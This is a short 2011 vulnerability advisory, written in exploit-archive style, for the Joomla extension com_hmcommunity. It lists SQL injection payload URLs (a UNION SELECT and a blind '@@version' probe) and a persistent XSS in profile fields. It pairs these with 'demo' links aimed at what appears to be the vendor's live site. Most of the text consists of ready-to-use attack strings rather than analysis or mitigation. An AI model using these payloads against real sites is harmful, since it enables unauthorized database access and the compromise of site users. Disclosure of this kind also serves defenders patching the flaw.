08 Novembre 2011
# [+] Joomla Compenent com_hmcommunity Multiple Vulnerabilities
# [+] Software : Joomla
# [+] Download : http://joomlaextensions.co.in/product/HM-Community
# [+] Author : 599eme Man
# [+] Contact :
Cette adresse e-mail est protégée contre les robots des spammeurs, vous devez activer Javascript pour la voir.
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerabilities
#
# [+] SQL
#
# - http://site.com/index.php?option=com_hmcommunity&view=fnd_home&id=[NB] union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155 union select all 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
#
# [+] Blind SQL
#
# - http://site.com//index.php?option=com_hmcommunity&view=fnd_home&id=155 and @@version=5
#
# [+] Demo
#
# - http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_home&id=155%20and%20@@version=5
#
# [+] Persistent XSS
#
# - The XSS is on the profile. You have to create an account and put your code in inputs.
#
# [+] Demo
#
# - Create an account and look this profile : http://www.hmcommunity.harmistechnology.com/index.php?option=com_hmcommunity&view=fnd_profile&uid=155
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################